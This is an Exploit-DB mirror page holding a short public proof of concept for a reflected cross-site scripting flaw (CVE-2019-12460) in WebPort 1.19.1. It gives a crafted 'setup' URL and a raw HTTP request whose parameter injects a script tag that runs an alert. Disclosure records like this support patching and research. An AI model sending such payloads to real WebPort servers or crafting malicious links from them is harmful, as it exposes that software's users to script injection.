bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/48612.txt
Offensive Security 09b5d3c1b6 DB: 2020-06-23 
6 changes to exploits/shellcodes

Frigate 2.02 - Denial Of Service (PoC)
FileRun 2019.05.21 -  Reflected Cross-Site Scripting
Student Enrollment 1.0 - Unauthenticated Remote Code Execution
Odoo 12.0 - Local File Inclusion
Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
WebPort 1.19.1 - Reflected Cross-Site Scripting
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
2020-06-23 05:02:25 +00:00

30 lines
No EOL
1.1 KiB
Text
Raw Blame History

# Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
# Date: 2019-05-30
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Version: v1.19.1
# Tested on: Windows/Linux
# CVE-2019-12460
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# PoC
To exploit vulnerability, someone could use 'http://
[server]:8090/access/setup?type="</script><script>alert('xss');</script><script>'
request
to impact users who open a maliciously crafted link or third-party web page.
GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1
Reference in a new issue View git blame Copy permalink